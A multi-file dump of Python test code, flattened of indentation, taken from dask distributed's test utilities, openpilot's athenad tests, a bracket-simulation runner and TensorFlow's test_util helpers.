assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
assert foo is True
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
assert foo is True
assert bar is False
@gen_test()
async def test_gen_test_pytest_fixture(tmp_path):
assert isinstance(tmp_path, pathlib.Path)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
def test__UnhashableCallable():
func = _UnhashableCallable()
assert func(1) == 2
with pytest.raises(TypeError, match="unhashable"):
hash(func)
class MyServer(Server):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.handlers["ping"] = self.pong
self.counter = 0
def pong(self, comm):
self.counter += 1
return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
async with MyServer({}) as a, await MyServer({}) as b:
await a.listen(0)
read_event = asyncio.Event()
read_event.set()
read_queue = asyncio.Queue()
original_pool = a.rpc
a.rpc = _LockedCommPool(
original_pool, read_event=read_event, read_queue=read_queue
)
await b.listen(0)
# Event is set, the pool works like an ordinary pool
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
assert res == "pong"
assert b.counter == 1
read_event.clear()
# Can also be used without a lock to intercept network traffic
a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
a.rpc.remove(b.address)
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
async with MyServer({}) as a, MyServer({}) as b:
await a.listen(0)
await b.listen(0)
read_event = asyncio.Event()
read_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
# We didn't block the write but merely the read. The remove should have
# received the message and responded already
while not b.counter:
await asyncio.sleep(0.001)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
assert await read_queue.get() == (b.address, "pong")
read_event.set()
assert await fut == "pong"
@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
async with MyServer({}) as a, MyServer({}) as b:
await a.listen(0)
await b.listen(0)
write_event = asyncio.Event()
write_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
# Write was blocked. The remote hasn't received the message, yet
assert b.counter == 0
assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
write_event.set()
assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
sleep_time = 30
async def inner_test(c, s, a, b):
await asyncio.sleep(sleep_time)
# This timeout includes cluster startup and teardown which sometimes can
# take a significant amount of time. For this particular test we would like
# to keep the _test timeout_ small because we intend to trigger it but the
# overall timeout large.
test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
inner_test
)
try:
with pytest.raises(asyncio.TimeoutError) as exc:
test()
assert "inner_test" in str(exc)
assert "await asyncio.sleep(sleep_time)" in str(exc)
except gen.TimeoutError:
pytest.xfail("Cluster startup or teardown took too long")
_, dirs, files = next(os.walk(tmp_path))
assert not dirs
assert files == [inner_test.__name__ + ".yaml"]
import yaml
with open(tmp_path / files[0], "rb") as fd:
state = yaml.load(fd, Loader=yaml.Loader)
assert "scheduler" in state
assert "workers" in state
def test_assert_worker_story():
now = time()
story = [
("foo", "id1", now - 600),
("bar", "id2", now),
("baz", {1: 2}, "id2", now),
]
# strict=False
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
assert_worker_story(story, [])
assert_worker_story(story, [("foo",)])
assert_worker_story(story, [("foo",), ("bar",)])
assert_worker_story(story, [("baz", lambda d: d[1] == 2)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo", "nomatch")])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", {1: 3})])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", lambda d: d[1] == 3)])
with pytest.raises(KeyError): # Faulty lambda
assert_worker_story(story, [("baz", lambda d: d[2] == 1)])
assert_worker_story([], [])
assert_worker_story([("foo", "id1", now)], [("foo",)])
with pytest.raises(AssertionError):
assert_worker_story([], [("foo",)])
# strict=True
assert_worker_story([], [], strict=True)
assert_worker_story([("foo", "id1", now)], [("foo",)])
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",)], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [], strict=True)
@pytest.mark.parametrize(
"story_factory",
[
pytest.param(lambda: [()], id="Missing payload, stimulus_id, ts"),
pytest.param(lambda: [("foo",)], id="Missing (stimulus_id, ts)"),
pytest.param(lambda: [("foo", "bar")], id="Missing ts"),
pytest.param(lambda: [("foo", "bar", "baz")], id="ts is not a float"),
pytest.param(lambda: [("foo", "bar", time() + 3600)], id="ts is in the future"),
pytest.param(lambda: [("foo", "bar", time() - 7200)], id="ts is too old"),
pytest.param(lambda: [("foo", 123, time())], id="stimulus_id is not a str"),
pytest.param(lambda: [("foo", "", time())], id="stimulus_id is an empty str"),
pytest.param(lambda: [("", time())], id="no payload"),
pytest.param(
lambda: [("foo", "id", time()), ("foo", "id", time() - 10)],
id="timestamps out of order",
),
],
)
def test_assert_worker_story_malformed_story(story_factory):
# defer the calls to time() to when the test runs rather than collection
story = story_factory()
with pytest.raises(AssertionError, match="Malformed story event"):
assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == {a.address, b.address}
@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
await dump_cluster_state(s, [], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"] == {}
@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == s.workers.keys()
@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
a.stop()
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][a.address], dict)
assert isinstance(out["workers"][b.address], dict)
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "600ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
clog_fut = asyncio.create_task(
c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[a.worker_address])
)
await asyncio.sleep(0.2)
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][b.worker_address], dict)
assert out["workers"][a.worker_address].startswith(
"OSError('Timed out trying to connect to"
)
clog_fut.cancel()
def garbage_process(barrier, ignore_sigterm: bool = False, t: float = 3600) -> None:
if ignore_sigterm:
for signum in (signal.SIGTERM, signal.SIGHUP, signal.SIGINT):
signal.signal(signum, signal.SIG_IGN)
barrier.wait()
sleep(t)
def test_check_process_leak():
barrier = mp_context.Barrier(parties=2)
with pytest.raises(AssertionError):
with check_process_leak(check=True, check_timeout=0.01):
p = mp_context.Process(target=garbage_process, args=(barrier,))
p.start()
barrier.wait()
assert not p.is_alive()
def test_check_process_leak_slow_cleanup():
"""check_process_leak waits a bit for processes to terminate themselves"""
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=True):
p = mp_context.Process(target=garbage_process, args=(barrier, False, 0.2))
p.start()
barrier.wait()
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_pre_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
with check_process_leak(term_timeout=0.2):
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_post_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=False, term_timeout=0.2):
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
assert not p.is_alive()
@pytest.mark.parametrize("nanny", [True, False])
def test_start_failure_worker(nanny):
with pytest.raises(TypeError):
with cluster(nanny=nanny, worker_kwargs={"foo": "bar"}):
return
def test_start_failure_scheduler():
with pytest.raises(TypeError):
with cluster(scheduler_kwargs={"foo": "bar"}):
return
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
print(dispatcher["listDataDirectory"]())
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
finally:
os.unlink(fn)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
finally:
athenad.upload_queue = queue.Queue()
os.unlink(fn)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
try:
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
finally:
athenad.upload_queue = queue.Queue()
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
Run.py
|
from Bracket_Class import Bracket, clean_year
import multiprocessing as mp
import time
def parallel_bracket(year):
B = Bracket(year)
B.run()
B.write_to_csv()
B.write()
def p_print(n, label):
if n == 0:
return ''
elif n == 1:
return '{} {} '.format(n, label)
else:
return '{} {}s '.format(n, label)
def htime(s):
H, i = divmod(s, 3600)
M, S = divmod(i, 60)
S = int(S)
return p_print(H, 'hour') + p_print(M, 'minute') + p_print(S, 'second')
if __name__ == '__main__':
print time.ctime()
t1 = time.time()
processes = []
for year in map(clean_year, range(3,15)):
processes.append( mp.Process(target=parallel_bracket, args=(year,)) )
for p in processes:
p.start()
for p in processes:
p.join()
B = {}
for year in map(clean_year, range(3,15)):
B[year] = Bracket.from_file(year)
print time.ctime()
t2 = time.time()
print 'Finished in {}!'.format( htime( t2 -t1 ) )
|
test_util.py
|
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
import contextlib
import math
import re
import threading
import tensorflow.python.platform
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import graph_util
from tensorflow.python.client import session
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util.protobuf import compare
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Root class for tests that need to test tensor flow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses Proto2Cmp() first, as it returns correct results
for floating point attributes, and then use assertProto2Equal()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if compare.Proto2Cmp(a, b) != 0:
compare.assertProto2Equal(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type " +
type(expected_message_maybe_ascii) + " and " +
type(message))
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device(graph_util.pin_to_cpu):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device(graph_util.pin_to_cpu):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: a float value.
f2: a float value.
err: a float value.
"""
self.assertTrue(math.fabs(f1 - f2) < err)
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
for f1, f2 in zip(farray1, farray2):
self.assertNear(f1, f2, err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
